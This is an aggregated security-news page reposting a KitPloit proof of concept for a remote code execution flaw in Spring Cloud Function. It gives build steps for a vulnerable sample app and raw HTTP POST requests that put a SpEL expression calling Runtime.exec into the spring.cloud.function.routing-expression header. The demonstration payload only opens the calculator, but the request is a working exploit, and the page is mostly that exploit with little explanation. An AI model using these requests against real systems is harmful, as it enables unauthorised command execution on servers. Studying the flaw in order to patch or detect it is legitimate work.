all InfoSec news
Spring-Spel-0Day-Poc - Spring-Cloud / spring-cloud-function, spring.cloud.function.routing-expression, RCE, 0day, 0-day, POC, EXP
March 31, 2022, 8:30 p.m. | noreply@blogger.com (Unknown)
KitPloit - PenTest Tools! www.kitploit.com
spring-cloud/spring-cloud-function RCE EXP POC https://github.com/spring-cloud/spring-cloud-function header
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a calculator.app")
build wget https://github.com/spring-cloud/spring-cloud-function/archive/refs/tags/v3.1.6.zipget path lists for test
unzip v3.1.6.zip
cd spring-cloud-function-3.1.6
cd spring-cloud-function-samples/function-sample-pojo
mvn package
java -jar ./target/function-sample-pojo-2.0.0.RELEASE.jar
find . -name "*.java"|xargs -I % cat %|grep -Eo '"([^" \.\/=>\|,:\}\+\)'"'"']{8,})"'|sort -u|sed 's/"//g' ...poc1
functionRouter
uppercase
lowercase
...
POST /functionRouter HTTP/1.1poc2
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Connection: close
spring.cloud.function.routing-expression:T(java.lang.Runtime).getRuntime().exec("open -a /System/Applications/Calculator.app")
Content-Length: 5
51pwn
POST /functionRouter HTTP/1.1
host:127.0.0.1:8080
User-Agent: Mozilla/5.0 …
0day cloud poc rce routing spel spring spring cloud function
More from www.kitploit.com / KitPloit - PenTest Tools!
Ioctlance - A Tool That Is Used To Hunt Vulnerabilities In X64 WDM Drivers
2 days, 14 hours ago |
www.kitploit.com
Jobs in InfoSec / Cybersecurity
Information Security Engineer (Vienna) - (m/f/d)
@ Sportradar | Wien, Poland
DevSecOps Engineer - U.S. Citizenship Required
@ Ardent MC | Remote
Head of AML, Regulatory and Compliance
@ Delivery Hero | Athens, Greece
Cybersecurity professional Mid-Senior level
@ Ethics Code | El Salvador - Remote
Senior Information Security Specialist
@ TRISTAR | 1801 Liberty Drive, Bloomington, IN, USA
SOC Analyst Level 2
@ Inbox Business Technologies | Islamabad, Islamabad Capital Territory, Pakistan